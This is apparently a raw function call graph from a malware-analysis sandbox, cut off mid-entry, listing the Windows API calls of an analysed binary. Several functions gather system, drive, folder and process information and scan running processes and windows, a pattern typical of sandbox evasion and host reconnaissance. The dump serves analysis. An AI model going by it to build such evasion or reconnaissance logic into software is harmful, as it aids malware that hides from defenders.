calls 96448->96455 96449 c8725e __acrt_iob_func 96457 c8cb20 78 API calls 96449->96457 96453 c8723d 96453->96451 96454 c8727e fflush _errno 96454->96451 96455->96453 96456->96449 96457->96454 97862 ca27e0 98 API calls 97863 cd64d8 100 API calls 97864 ddabf0 69 API calls 97150 c829ff FindFirstFileA 97151 c82a31 97150->97151 97197 1156350 strlen 97151->97197 97153 c82a45 97154 11563e0 13 API calls 97153->97154 97155 c82a5c RegOpenKeyExA 97154->97155 97156 c82a93 97155->97156 97157 1156350 strlen 97156->97157 97158 c82aa7 97157->97158 97159 11563e0 13 API calls 97158->97159 97160 c82abe CharUpperA strstr 97159->97160 97162 c82b0e 97160->97162 97163 1156350 strlen 97162->97163 97164 c82b22 97163->97164 97165 11563e0 13 API calls 97164->97165 97166 c82b39 CreateToolhelp32Snapshot Process32First 97165->97166 97167 c82b94 97166->97167 97170 c82ba5 QueryFullProcessImageNameA 97166->97170 97169 c82bb0 Process32Next 97167->97169 97167->97170 97169->97167 97169->97170 97171 c82c3b CloseHandle strstr 97170->97171 97172 c82c68 97171->97172 97173 1156350 strlen 97172->97173 97174 c82c7c 97173->97174 97175 11563e0 13 API calls 97174->97175 97176 c82c93 CreateToolhelp32Snapshot Process32First 97175->97176 97177 c82d99 97176->97177 97178 c82cef strncpy 97176->97178 97179 1156350 strlen 97177->97179 97180 c82d31 strstr 97178->97180 97181 c82dda 97179->97181 97180->97177 97182 c82d4b strstr 97180->97182 97183 11563e0 13 API calls 97181->97183 97182->97177 97184 c82d65 strstr 97182->97184 97185 c82df1 CloseHandle EnumWindows 97183->97185 97184->97177 97187 c82d7f strstr 97184->97187 97186 c82e30 97185->97186 97189 1156350 strlen 97186->97189 97187->97177 97188 c82daf Process32Next 97187->97188 97188->97177 97188->97178 97190 c82e44 97189->97190 97191 11563e0 13 API calls 97190->97191 97192 c82e5b 97191->97192 97193 1156350 strlen 97192->97193 97194 c82ef7 97193->97194 97195 11563e0 13 API calls 97194->97195 97196 c82f0e 97195->97196 97867 d9f5e0 85 API calls 97868 ec87d0 50 API calls 97869 dda9e0 135 API calls 97871 cfd1f0 216 API calls 97872 c835f7 45 API calls 96458 c83b80 AcquireSRWLockExclusive 96459 c83b94 ReleaseSRWLockExclusive 96458->96459 96463 c83bb6 96458->96463 96469 c9ff30 96459->96469 96461 c83ba6 96462 c83bfb ReleaseSRWLockExclusive 96463->96462 96485 c9d5e0 96463->96485 96465 c83c1f 96465->96462 96497 cafe50 20 API calls 96465->96497 96467 c83c34 96467->96462 96468 c83c38 96467->96468 96468->96459 96498 c87310 96469->96498 96471 c9ff9e 96471->96461 96472 c9ff48 96472->96471 96510 cb67d0 96472->96510 96475 c9ff7a 96514 c967b0 191 API calls 96475->96514 96476 c9ffa6 96521 c9fd50 87 API calls 96476->96521 96479 c9ffb0 96522 c85700 50 API calls 96479->96522 96480 c9ff83 96515 c875a0 96480->96515 96484 c9ffcd 96484->96461 96486 c9d5f0 96485->96486 96487 c9d652 WSAStartup 96485->96487 96776 c9d690 94 API calls 96486->96776 96488 c9d670 96487->96488 96489 c9d664 96487->96489 96488->96486 96491 c9d67c WSACleanup 96488->96491 96489->96465 96491->96465 96492 c9d5fa 96493 c9d616 96492->96493 96494 c9d606 GetProcAddress 96492->96494 96777 ca7620 11 API calls 96493->96777 96494->96493 96496 c9d636 QueryPerformanceFrequency 96496->96465 96497->96467 96499 c87320 96498->96499 96501 c87332 96498->96501 96500 c87390 96499->96500 96499->96501 96524 c872a0 50 API calls 96500->96524 96504 c87383 96501->96504 96505 c87366 96501->96505 96503 c873a1 __acrt_iob_func 96525 c8cb20 78 API calls 96503->96525 96504->96472 96523 c872a0 50 API calls 96505->96523 96508 c873c1 fflush _errno 96508->96504 96509 c87380 96509->96504 96511 cb67f8 96510->96511 96526 d34720 96511->96526 96513 c9ff73 96513->96475 96513->96476 96514->96480 96516 c875aa 96515->96516 96517 c875d4 96515->96517 96516->96517 96518 c875c1 96516->96518 96517->96461 96775 c872a0 50 API calls 96518->96775 96520 c875d1 96520->96517 96521->96479 96522->96484 96523->96509 96524->96503 96525->96508 96527 d34728 96526->96527 96528 d34733 96527->96528 96529 d34fe0 memset 96527->96529 96528->96513 96530 d34745 96529->96530 96531 d3477d 96530->96531 96561 d485e0 memset InitializeCriticalSection InitializeConditionVariable DeleteCriticalSection 96530->96561 96531->96513 96533 d34765 96534 d3476c 96533->96534 96562 d48a80 7 API calls 96533->96562 96557 d34878 96534->96557 96602 d330a0 83 API calls 96534->96602 96537 d34791 96537->96534 96563 d3ed80 memset 96537->96563 96538 d34774 96538->96513 96540 d347b0 96540->96534 96541 d3e730 memset 96540->96541 96542 d347c4 96541->96542 96542->96534 96564 d3e530 memset _time64 96542->96564 96544 d347d8 96544->96534 96565 d3ed80 memset 96544->96565 96546 d347f7 96546->96534 96566 d3e000 memset _time64 96546->96566 96548 d3480f 96548->96534 96567 d35540 73 API calls 96548->96567 96550 d3482e 96550->96534 96568 d37720 memset memset memset _time64 96550->96568 96552 d3484f 96552->96534 96569 d39270 96552->96569 96554 d34860 96586 d34950 96554->96586 96557->96513 96559 d34886 96559->96534 96604 d3f5f0 15 API calls 96559->96604 96561->96533 96562->96537 96563->96540 96564->96544 96565->96546 96566->96548 96567->96550 96568->96552 96605 d3a440 96569->96605 96573 d392a4 96578 d392ab 96573->96578 96685 d486d0 EnterCriticalSection 96573->96685 96575 d392f3 96576 d3930c 96575->96576 96686 d3bbe0 71 API calls 96575->96686 96577 d39331 96576->96577 96584 d393d5 96576->96584 96687 d47c60 memset strlen memcpy 96576->96687 96579 d3936a 96577->96579 96577->96584 96688 d478a0 96577->96688 96578->96554 96579->96584 96585 d393b1 memcpy 96579->96585 96693 d486f0 LeaveCriticalSection 96584->96693 96585->96584 96587 d34966 96586->96587 96588 d34a14 htonl 96587->96588 96593 d3486a 96587->96593 96596 d349b9 96587->96596 96773 d3b590 7 API calls 96588->96773 96590 d34a3e 96590->96593 96774 d3bbe0 71 API calls 96590->96774 96591 d349c5 96592 d478a0 2 API calls 96591->96592 96591->96593 96592->96593 96593->96534 96593->96557 96603 d3fa20 9 API calls 96593->96603 96595 d34aa0 gethostname 96597 d34ab3 WSAGetLastError 96595->96597 96598 d34b35 strchr 96595->96598 96596->96591 96596->96593 96596->96595 96597->96596 96597->96598 96598->96591 96600 d34b4f 96598->96600 96600->96593 96601 d478a0 2 API calls 96600->96601 96601->96591 96602->96538 96603->96559 96604->96534 96606 d3a46b 96605->96606 96607 d3a4db 96606->96607 96610 d3a48b GetAdaptersAddresses 96606->96610 96649 d39297 96607->96649 96743 d4cb10 GetVersionExA 96607->96743 96609 d3a9fa 96611 d3aa03 RegOpenKeyExA 96609->96611 96609->96649 96635 d3a4a6 96610->96635 96670 d3a53f 96610->96670 96612 d3ab70 RegOpenKeyExA 96611->96612 96613 d3aa27 RegQueryValueExA 96611->96613 96614 d3ab90 RegQueryValueExA 96612->96614 96615 d3ac34 RegOpenKeyExA 96612->96615 96616 d3aa71 96613->96616 96617 d3aacc RegQueryValueExA 96613->96617 96618 d3abd2 96614->96618 96619 d3ac26 RegCloseKey 96614->96619 96622 d3ac54 RegQueryValueExA 96615->96622 96623 d3acf8 RegOpenKeyExA 96615->96623 96616->96617 96630 d3aa85 RegQueryValueExA 96616->96630 96620 d3ab66 RegCloseKey 96617->96620 96621 d3ab0e 96617->96621 96618->96619 96636 d3abe2 RegQueryValueExA 96618->96636 96619->96615 96620->96612 96621->96620 96638 d3ab1e RegQueryValueExA 96621->96638 96624 d3ac96 96622->96624 96625 d3acea RegCloseKey 96622->96625 96627 d3ad56 RegEnumKeyExA 96623->96627 96628 d3ad14 96623->96628 96624->96625 96646 d3aca6 RegQueryValueExA 96624->96646 96625->96623 96626 d3a87d qsort 96640 d3a520 96626->96640 96674 d3a8a0 96626->96674 96631 d3ad9b 96627->96631 96632 d3b15d RegCloseKey 96627->96632 96628->96649 96751 d47cf0 memset memcpy memcmp strlen 96628->96751 96629 d3a4f3 GetAdaptersAddresses 96633 d3a505 96629->96633 96629->96670 96637 d3aab3 96630->96637 96634 d3ae16 RegOpenKeyExA 96631->96634 96632->96628 96632->96649 96633->96640 96645 d3a527 GetAdaptersAddresses 96633->96645 96643 d3ae34 RegQueryValueExA 96634->96643 96644 d3addf RegEnumKeyExA 96634->96644 96635->96629 96635->96640 96641 d3ac1b 96636->96641 96642 d3ac0c 96636->96642 96637->96617 96647 d3ab5b 96638->96647 96648 d3ab4c 96638->96648 96640->96607 96747 d3b830 26 API calls 96640->96747 96641->96619 96749 d3b1e0 strlen strncat strlen 96642->96749 96654 d3af43 RegQueryValueExA 96643->96654 96679 d3adbc 96643->96679 96644->96634 96653 d3b155 96644->96653 96645->96640 96645->96670 96655 d3acd0 96646->96655 96656 d3acdf 96646->96656 96647->96620 96748 d3b1e0 strlen strncat strlen 96648->96748 96649->96578 96684 d39b60 11 API calls 96649->96684 96651 d3a8f0 strcmp 96651->96674 96653->96632 96658 d3b052 RegQueryValueExA 96654->96658 96654->96679 96750 d3b1e0 strlen strncat strlen 96655->96750 96656->96625 96661 d3adc7 RegCloseKey 96658->96661 96658->96679 96660 d3a794 GetBestRoute2 96663 d3d190 36 API calls 96660->96663 96661->96644 96662 d3ae91 RegQueryValueExA 96662->96679 96663->96670 96664 d3afa0 RegQueryValueExA 96664->96679 96665 d47890 strlen 96665->96674 96666 d3b0af RegQueryValueExA 96666->96679 96667 d3a6c7 GetBestRoute2 96694 d3d190 96667->96694 96668 d3a81e htons 96668->96670 96670->96626 96670->96640 96670->96660 96670->96667 96670->96668 96671 d3a746 htons 96670->96671 96673 d3b180 32 API calls 96670->96673 96671->96670 96672 d47890 strlen 96672->96679 96673->96670 96674->96640 96674->96651 96674->96665 96675 d3a991 strlen 96674->96675 96676 d3a8b0 strncat 96674->96676 96675->96676 96676->96674 96677 d3af17 strlen 96678 d3af26 strncat 96677->96678 96678->96679 96679->96654 96679->96658 96679->96661 96679->96662 96679->96664 96679->96666 96679->96672 96679->96677 96679->96678 96680 d3b026 strlen 96679->96680 96681 d3b035 strncat 96679->96681 96682 d3b141 strlen 96679->96682 96683 d3adaa strncat 96679->96683 96680->96681 96681->96679 96682->96683 96683->96679 96684->96573 96685->96575 96686->96576 96687->96577 96689 d478e1 96688->96689 96690 d478ae strlen 96688->96690 96689->96579 96690->96689 96691 d478bc 96690->96691 96691->96689 96692 d478d6 memcpy 96691->96692 96692->96689 96693->96578 96695 d3d1ae 96694->96695 96702 d3d1fa 96694->96702 96696 d3d253 SetLastError 96695->96696 96752 d3d8f0 32 API calls 96695->96752 96699 d3d872 96696->96699 96699->96670 96700 d3d1f3 96769 d478f0 strlen memcpy 96700->96769 96703 d3d4b7 96702->96703 96704 d3d4f9 96702->96704 96753 d3d8f0 32 API calls 96703->96753 96706 d3d504 96704->96706 96761 d3d8f0 32 API calls 96704->96761 96713 d3d516 96706->96713 96762 d3d8f0 32 API calls 96706->96762 96707 d3d4ce 96717 d3d4e3 96707->96717 96754 d3d8f0 32 API calls 96707->96754 96709 d3d51f 96711 d3d52c 96709->96711 96764 d3d8f0 32 API calls 96709->96764 96716 d3d535 96711->96716 96765 d3d8f0 32 API calls 96711->96765 96713->96709 96763 d3d8f0 32 API calls 96713->96763 96729 d3d53e 96716->96729 96766 d3d8f0 32 API calls 96716->96766 96718 d3d4f4 96717->96718 96755 d3d8f0 32 API calls 96717->96755 96723 d3d5bf 96718->96723 96756 d3d8f0 32 API calls 96718->96756 96721 d3d547 96727 d3d1e8 96721->96727 96768 d3d8f0 32 API calls 96721->96768 96728 d3d5fb 96723->96728 96757 d3d8f0 32 API calls 96723->96757 96726 d3d87f 96726->96696 96770 d3d8f0 32 API calls 96726->96770 96727->96696 96727->96700 96734 d3d632 96728->96734 96758 d3d8f0 32 API calls 96728->96758 96729->96721 96729->96726 96731 d3d7fe 96729->96731 96767 d3d8f0 32 API calls 96731->96767 96733 d3d8b6 96733->96696 96771 d478f0 strlen memcpy 96733->96771 96738 d3d66e 96734->96738 96759 d3d8f0 32 API calls 96734->96759 96738->96727 96760 d3d8f0 32 API calls 96738->96760 96739 d3d8c5 96772 d47890 strlen 96739->96772 96744 d4cb6a GetVersionExA 96743->96744 96745 d4cbbb 96743->96745 96744->96745 96746 d4cbd2 96744->96746 96745->96609 96746->96609 96747->96607 96748->96647 96749->96641 96750->96656 96751->96649 96752->96727 96753->96707 96754->96717 96755->96718 96756->96723 96757->96728 96758->96734 96759->96738 96760->96727 96761->96706 96762->96713 96763->96709 96764->96711 96765->96716 96766->96729 96767->96721 96768->96727 96769->96699 96770->96733 96771->96739 96772->96727 96773->96590 96774->96596 96775->96520 96776->96492 96777->96496 97874 c81580 FreeLibrary 97876 f9bdb0 83 API calls 97877 cae380 106 API calls 97879 ce1580 158 API calls 96912 e047b0 96940 e5e5d0 strlen MultiByteToWideChar 96912->96940 96915 e04824 96955 e37120 20 API calls 96915->96955 96916 e047df 96953 dfd520 20 API calls 96916->96953 96919 e04829 96956 e37220 20 API calls 96919->96956 96920 e047ed 96922 e047f8 96920->96922 96923 e0488d fclose 96920->96923 96954 dfdf50 20 API calls 96922->96954 96939 e0481a 96923->96939 96924 e0483a GetLastError 96957 e37310 20 API calls 96924->96957 96927 e04852 _errno 96928 e04860 _errno 96927->96928 96929 e0486b 96927->96929 96928->96929 96930 e04898 96928->96930 96958 e37120 20 API calls 96929->96958 96960 e37120 20 API calls 96930->96960 96933 e04870 96959 e37220 20 API calls 96933->96959 96934 e0489d 96961 e37220 20 API calls 96934->96961 96937 e04881 96962 e37310 20 API calls 96937->96962 96941 e5e6b0 GetLastError 96940->96941 96944 e5e608 96940->96944 96942 e5e6e2 GetLastError 96941->96942 96943 e5e6bd MultiByteToWideChar 96941->96943 96945 e5e6f4 fopen 96942->96945 96946 e047c4 strchr 96942->96946 96943->96942 96943->96944 96947 e5e622 MultiByteToWideChar 96944->96947 96945->96946 96946->96915 96946->96916 96947->96946 96948 e5e649 strlen MultiByteToWideChar 96947->96948 96948->96946 96949 e5e673 _wfopen 96948->96949 96949->96946 96950 e5e685 _errno 96949->96950 96951 e5e6a0 fopen 96950->96951 96952 e5e690 _errno 96950->96952 96951->96946 96952->96946 96952->96951 96953->96920 96954->96939 96955->96919 96956->96924 96957->96927 96958->96933 96959->96937 96960->96934 96961->96937 96962->96939 97880 d44b80 16 API calls 97882 d63f80 strcmp strcmp 97883 dd6f80 88 API calls 97884 fdb3a0 memcpy memcpy free free 97885 cf2590 155 API calls 97887 ff9da0 malloc malloc free 97888 f0e990 62 API calls 97889 e62580 24 API calls 97890 e6a780 memset 97892 cac5a0 90 API calls 97893 da4fb0 20 API calls 97894 dba7b0 93 API calls 97895 cbd7a0 87 API calls 97896 df27b0 _time64 _gmtime64 97897 d9fba0 27 API calls 97899 cd2db0 107 API calls 97900 cef5b0 140 API calls 97901 f10170 91 API calls 95937 d38b50 95938 d38b60 95937->95938 95940 d38b88 95938->95940 95961 d48e70 95938->95961 95966 d488b0 QueryPerformanceFrequency QueryPerformanceCounter 95940->95966 95942 d38b9a 95947 d38c32 95942->95947 95968 d37820 95942->95968 95944 d38bc6 95944->95947 95977 d44530 95944->95977 95946 d38c2b 95946->95947 95948 d38cb5 95946->95948 96010 d38db0 13 API calls 95946->96010 95984 d3e7c0 95948->95984 95952 d38d83 95952->95948 95953 d38d8d 95952->95953 96011 d36e90 memset memset 95953->96011 95956 d38d40 96009 d36e90 memset memset 95956->96009 95957 d38d1a 95992 d36050 95957->95992 95962 d48ea7 95961->95962 95963 d48e80 95961->95963 95962->95938 96012 d48d60 9 API calls 95963->96012 95965 d48e95 95965->95962 95967 d488f2 95966->95967 95967->95942 95969 d3784c 95968->95969 95973 d378f8 95968->95973 95971 d37877 95969->95971 95972 d378c0 95969->95972 95969->95973 95976 d378bc 95969->95976 95971->95976 96013 d3f400 memset memset 95971->96013 95972->95976 96014 d3f400 memset memset 95972->96014 95973->95944 96015 d37960 6 API calls 95976->96015 95978 d4455e 95977->95978 95979 d44579 95977->95979 96016 d44c20 17 API calls 95978->96016 95979->95946 95981 d44572 95981->95979 96017 d417d0 95981->96017 95983 d4458e 95983->95946 95985 d3e7db 95984->95985 95987 d38cf2 95984->95987 96048 d34fe0 95985->96048 95987->95956 95988 d3e600 95987->95988 95989 d38d13 95988->95989 95990 d3e60d 95988->95990 95989->95956 95989->95957 95990->95989 96052 d4cd70 memset 95990->96052 95993 d360d9 95992->95993 96053 d4aa30 95993->96053 95997 d364a4 96092 d3f400 memset memset 95997->96092 95999 d364c7 96000 d36506 95999->96000 96001 d368df 95999->96001 96093 d4c320 QueryPerformanceFrequency QueryPerformanceCounter 96000->96093 96003 d36050 61 API calls 96001->96003 96005 d368d2 96003->96005 96004 d36515 96094 d3f400 memset memset 96004->96094 96005->95947 96007 d3652f 96095 d48880 WakeAllConditionVariable 96007->96095 96010->95952 96012->95965 96013->95971 96014->95972 96015->95973 96016->95981 96018 d41801 96017->96018 96020 d41918 96017->96020 96038 d45cc0 memset 96018->96038 96020->95983 96021 d41808 96021->96020 96039 d42cb0 memset 96021->96039 96023 d41911 96023->96020 96024 d41990 96023->96024 96040 d431b0 memset 96023->96040 96024->96020 96026 d419ab 96024->96026 96041 d431b0 memset 96024->96041 96026->96020 96030 d419ca 96026->96030 96042 d431b0 memset 96026->96042 96030->96020 96037 d41a76 96030->96037 96043 d4e3e0 memset memcpy memmove memmove memcpy 96030->96043 96044 d42f90 7 API calls 96030->96044 96031 d41a9f 96031->96020 96032 d41ac8 96031->96032 96046 d41b30 18 API calls 96031->96046 96032->96020 96047 d41b30 18 API calls 96032->96047 96037->96020 96037->96031 96045 d41b30 18 API calls 96037->96045 96038->96021 96039->96023 96040->96024 96041->96026 96042->96030 96043->96030 96044->96030 96045->96037 96046->96031 96047->96032 96049 d34fec 96048->96049 96050 d35003 96049->96050 96051 d34ff3 memset 96049->96051 96050->95987 96051->96050 96052->95989 96054 d4aa5f 96053->96054 96055 d362fc 96054->96055 96096 d3e730 96054->96096 96091 d36d50 44 API calls 96055->96091 96058 d4aabf 96060 d4aacd htons 96058->96060 96067 d4ab0e 96058->96067 96059 d4ab18 htons 96061 d4ab58 96059->96061 96060->96061 96062 d4ab96 socket 96061->96062 96066 d4ab75 96061->96066 96062->96066 96062->96067 96063 d4abd0 ioctlsocket 96064 d4ac10 96063->96064 96065 d4abef setsockopt 96063->96065 96068 d4ac16 setsockopt 96064->96068 96069 d4ac37 96064->96069 96065->96064 96065->96067 96066->96063 96066->96067 96081 d4ad2e 96066->96081 96067->96055 96070 d4ae6e closesocket 96067->96070 96068->96067 96068->96069 96071 d4ac7a 96069->96071 96072 d4ad04 96069->96072 96075 d4ac57 htonl 96069->96075 96070->96055 96073 d4ace7 setsockopt 96071->96073 96076 d4ac9d 96071->96076 96077 d4ad0a setsockopt 96072->96077 96072->96081 96073->96072 96074 d4ada0 connect 96079 d4adb3 WSAGetLastError 96074->96079 96078 d4acc6 bind 96075->96078 96076->96078 96077->96067 96077->96081 96078->96067 96080 d4acdd 96078->96080 96079->96067 96079->96081 96080->96072 96080->96073 96081->96067 96081->96074 96081->96079 96082 d4ade1 96081->96082 96082->96067 96099 d4af70 96082->96099 96085 d4aeaf 96102 d3e760 memset 96085->96102 96086 d4ae9f 96088 d3e7c0 memset 96086->96088 96089 d4aea6 96088->96089 96089->96067 96103 d3e180 memset 96089->96103 96091->95997 96092->95999 96093->96004 96094->96007 96095->96005 96097 d34fe0 memset 96096->96097 96098 d3e737 96097->96098 96098->96058 96098->96059 96098->96067 96100 d4af93 getsockname 96099->96100 96101 d4ae21 96099->96101 96100->96101 96101->96067 96101->96085 96101->96086 96102->96089 96103->96067 97904 e62360 22 API calls 97905 d68b50 359 API calls 97907 ca2740 84 API calls 97908 cb5340 321 API calls 97909 ebf560 68 API calls 97910 cfa340 746 API calls 97911 d2e940 20 API calls 96963 d49740 96964 d49780 96963->96964 96965 d4975d 96963->96965 96966 d49914 memset RegOpenKeyExA 96964->96966 96967 d49788 getenv 96964->96967 96968 d478a0 2 API calls 96965->96968 96969 d4995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 96966->96969 96990 d49812 96966->96990 96970 d478a0 2 API calls 96967->96970 96975 d49763 96968->96975 96971 d478a0 2 API calls 96969->96971 96972 d4979b 96970->96972 96971->96972 96973 d497a6 _stat64 96972->96973 96972->96990 96974 d497c7 96973->96974 96980 d4980b 96973->96980 96976 d497f6 _stricmp 96974->96976 96977 d497e2 _time64 96974->96977 96975->96967 96975->96973 96975->96990 96976->96980 96977->96976 96979 d4986e 96979->96990 97005 d477b0 96979->97005 96980->96990 97004 d45ca0 memset 96980->97004 96983 d34fe0 memset 96984 d49896 96983->96984 96985 d498a1 _time64 96984->96985 96984->96990 96986 d478a0 2 API calls 96985->96986 96987 d498bb 96986->96987 96987->96990 97018 d3e2d0 memset _time64 96987->97018 96989 d498d3 96989->96990 97019 d3e2d0 memset _time64 96989->97019 96992 d3d190 36 API calls 97002 d498e8 96992->97002 96993 d3d120 17 API calls 96993->97002 96994 d34fe0 memset 96994->97002 96996 d3e730 memset 96996->97002 96997 d46d60 memcmp 96997->97002 96998 d46320 memcpy 96998->97002 96999 d3e3c0 memset strlen memcpy 96999->97002 97000 d478a0 strlen memcpy 97000->97002 97001 d49c3d _stricmp 97001->97002 97002->96990 97002->96992 97002->96993 97002->96994 97002->96996 97002->96997 97002->96998 97002->96999 97002->97000 97002->97001 97003 d3e7c0 memset 97002->97003 97020 d3e760 memset 97002->97020 97003->97002 97004->96979 97006 d47827 97005->97006 97007 d477d7 fopen 97005->97007 97006->96983 97006->96990 97008 d4780e GetLastError 97007->97008 97009 d477e9 fseek 97007->97009 97008->97006 97010 d47801 fclose 97009->97010 97011 d4782f ftell 97009->97011 97010->97006 97011->97010 97012 d4783c fseek 97011->97012 97012->97010 97013 d4784f 97012->97013 97014 d4787a 97013->97014 97021 d46050 97013->97021 97014->97010 97017 d47866 fread 97017->97010 97017->97014 97018->96989 97019->97002 97020->97002 97022 d4606e 97021->97022 97023 d4605d 97021->97023 97022->97014 97022->97017 97023->97022 97025 d45e20 memmove 97023->97025 97025->97022 97026 c8255d 97079 1009f70 97026->97079 97032 c825a0 GlobalMemoryStatusEx 97033 11561f0 malloc 97032->97033 97034 c825ec 97033->97034 97035 11563e0 13 API calls 97034->97035 97036 c82603 GetLogicalDriveStringsA 97035->97036 97037 c8277c 97036->97037 97038 c82626 97036->97038 97041 11561f0 malloc 97037->97041 97092 1155ff0 97038->97092 97040 c8262b 97042 c8263c GetDriveTypeA 97040->97042 97043 c82762 97040->97043 97044 c827bf 97041->97044 97047 c82743 strlen 97042->97047 97048 c82655 GetDiskFreeSpaceExA 97042->97048 97045 11563e0 13 API calls 97043->97045 97046 11563e0 13 API calls 97044->97046 97045->97037 97049 c827d6 KiUserCallbackDispatcher 97046->97049 97047->97040 97048->97047 97050 c8268b 97048->97050 97052 c827f8 97049->97052 97050->97047 97056 11563e0 13 API calls 97050->97056 97065 11560e0 malloc 97050->97065 97095 11562c0 malloc 97050->97095 97102 1156350 strlen 97050->97102 97054 11561f0 malloc 97052->97054 97055 c82809 97054->97055 97057 11563e0 13 API calls 97055->97057 97056->97050 97058 c82820 97057->97058 97059 11561f0 malloc 97058->97059 97060 c8282b 97059->97060 97061 11563e0 13 API calls 97060->97061 97062 c82842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 97061->97062 97063 c82928 97062->97063 97064 c82906 FindNextFileW 97062->97064 97066 11561f0 malloc 97063->97066 97064->97063 97064->97064 97065->97050 97067 c8293d 97066->97067 97068 11563e0 13 API calls 97067->97068 97069 c82954 K32EnumProcesses 97068->97069 97070 c8297b 97069->97070 97074 c829a9 97069->97074 97071 11561f0 malloc 97070->97071 97072 c82992 97071->97072 97073 11563e0 13 API calls 97072->97073 97073->97074 97075 11561f0 malloc 97074->97075 97076 c829e0 97075->97076 97077 11563e0 13 API calls 97076->97077 97078 c829f7 97077->97078 97080 c8256c GetSystemInfo 97079->97080 97081 11561f0 malloc 97080->97081 97082 c82589 97081->97082 97083 11563e0 97082->97083 97084 11563fc 97083->97084 97085 1156448 _strdup 97084->97085 97086 115641b 97084->97086 97091 1156431 97084->97091 97087 1156454 97085->97087 97085->97091 97086->97091 97103 1156a70 97086->97103 97115 115aa80 7 API calls 97087->97115 97090 1156473 97090->97032 97091->97032 97121 1156010 malloc 97092->97121 97096 11562d4 97095->97096 97097 115631e 97095->97097 97129 115a7f0 calloc calloc free 97096->97129 97097->97050 97099 1156315 97099->97097 97100 115b6f0 free 97099->97100 97101 1156334 free _errno 97100->97101 97101->97097 97104 1156a7d 97103->97104 97105 1156ae0 97104->97105 97106 1156a90 97104->97106 97120 1153b10 free 97105->97120 97108 1156ac8 97106->97108 97111 1156a95 97106->97111 97109 1156acf free 97108->97109 97110 1156aa5 97108->97110 97109->97110 97116 115b6f0 97110->97116 97111->97110 97119 115a9e0 free 97111->97119 97115->97090 97117 115b6fc free 97116->97117 97118 1156ab0 free 97116->97118 97117->97118 97118->97091 97122 1156024 97121->97122 97123 1155fff 97121->97123 97128 1153cd0 malloc malloc free 97122->97128 97123->97040 97125 1156065 97126 1156069 97125->97126 97127 1156078 free 97125->97127 97126->97123 97127->97123 97128->97125 97129->97099 97914 ea9d70 56 API calls 97497 cb8b50 97498 cb8b6b 97497->97498 97499 cb8be6 97497->97499 97498->97499 97500 cb8b8f 97498->97500 97501 cb8bf3 97498->97501 97657 c96e40 11 API calls 97500->97657 97538 cba550 97501->97538 97505 cb8ba1 97506 cb8cd9 SleepEx getsockopt 97505->97506 97521 cb8bb5 97505->97521 97527 cb8c99 97505->97527 97507 cb8d18 WSAGetLastError 97506->97507 97508 cb8d22 97506->97508 97507->97508 97514 cb8d43 97508->97514 97534 cb8ccf 97508->97534 97509 cb8e85 97509->97499 97523 cb8eae 97509->97523 97664 c92a00 50 API calls 97509->97664 97510 cba150 84 API calls 97515 cb8dff WSASetLastError 97510->97515 97511 cb8cb2 97511->97534 97659 cbb180 SleepEx getsockopt WSAGetLastError 97511->97659 97512 cb8c1f connect 97513 cb8c35 WSAGetLastError 97512->97513 97644 cba150 97513->97644 97517 c9d8c0 2 API calls 97514->97517 97515->97509 97524 cb8e1b 97515->97524 97522 cb8d4d 97517->97522 97521->97499 97531 cb8d66 97521->97531 97526 cba150 84 API calls 97522->97526 97523->97499 97665 c878b0 closesocket 97523->97665 97524->97509 97662 c9d090 66 API calls 97524->97662 97526->97531 97527->97506 97527->97511 97528 cb8dc8 97661 cbb100 68 API calls 97528->97661 97531->97499 97660 cc50a0 51 API calls 97531->97660 97532 cb8e67 97663 cc4fd0 51 API calls 97532->97663 97534->97499 97534->97509 97534->97510 97537 cb8c8b 97537->97527 97537->97528 97539 c9d8c0 2 API calls 97538->97539 97540 cba575 97539->97540 97542 cba597 97540->97542 97670 c875e0 97540->97670 97543 cba6d9 97542->97543 97683 cbef30 97542->97683 97544 cba709 97543->97544 97562 cba713 97543->97562 97698 c92a00 50 API calls 97543->97698 97546 c878b0 51 API calls 97544->97546 97544->97562 97546->97562 97547 cb8bfc 97547->97499 97547->97512 97547->97513 97547->97534 97549 cba63a 97550 cba69b _errno _errno _errno 97549->97550 97551 cba641 97549->97551 97696 c9d090 66 API calls 97550->97696 97552 cba650 setsockopt 97551->97552 97555 cba683 97551->97555 97554 cba7e5 97552->97554 97552->97555 97560 cba8ee 97554->97560 97561 cba802 97554->97561 97555->97554 97700 cc4fd0 51 API calls 97555->97700 97556 cba6c9 97697 cc4f40 52 API calls 97556->97697 97565 cba92a 97560->97565 97566 cba962 getsockopt 97560->97566 97589 cba9ac 97560->97589 97563 cba87c 97561->97563 97564 cba811 setsockopt 97561->97564 97562->97547 97699 cc50a0 51 API calls 97562->97699 97568 cbac6a 97563->97568 97572 cba8b9 97563->97572 97573 cbac20 getsockopt 97563->97573 97564->97563 97567 cba83b 97564->97567 97704 ca7620 11 API calls 97565->97704 97570 cba991 setsockopt 97566->97570 97571 cba984 97566->97571 97567->97563 97575 cba854 WSAGetLastError 97567->97575 97568->97589 97705 cbb1e0 58 API calls 97568->97705 97570->97589 97571->97570 97571->97589 97703 ca7620 11 API calls 97572->97703 97576 cbac4f setsockopt 97573->97576 97577 cbac42 97573->97577 97574 cba945 97574->97566 97580 cba94c 97574->97580 97701 c9d090 66 API calls 97575->97701 97576->97568 97577->97568 97577->97576 97580->97589 97582 cbaf41 97695 ce67e0 ioctlsocket 97582->97695 97583 cba8d4 97583->97573 97586 cba8df 97583->97586 97584 cba86d 97702 cc4fd0 51 API calls 97584->97702 97586->97568 97588 cbaf56 97590 cbafb9 WSAGetLastError 97588->97590 97591 cbaf5d 97588->97591 97589->97543 97589->97582 97592 cbab0a strlen 97589->97592 97593 cbabe1 97589->97593 97590->97543 97591->97562 97594 cba150 84 API calls 97591->97594 97592->97593 97597 cbab22 97592->97597 97595 cbabee 97593->97595 97596 cbaed3 htons 97593->97596 97598 cbaf8f 97594->97598 97599 cbaeeb bind 97595->97599 97600 cbabf9 htons 97595->97600 97596->97599 97603 cbacb8 97597->97603 97604 cbae32 97597->97604 97609 cbabb9 97597->97609 97601 c9d8c0 2 API calls 97598->97601 97606 cbaf03 97599->97606 97633 cbafcf 97599->97633 97602 cbac0c 97600->97602 97601->97562 97602->97599 97603->97543 97603->97609 97615 cbacdc WSAGetLastError 97603->97615 97604->97609 97713 cc4fd0 51 API calls 97604->97713 97605 cbaf33 97605->97582 97606->97605 97715 cc4fd0 51 API calls 97606->97715 97607 cbb056 WSAGetLastError 97717 c9d090 66 API calls 97607->97717 97612 cbadc5 97609->97612 97613 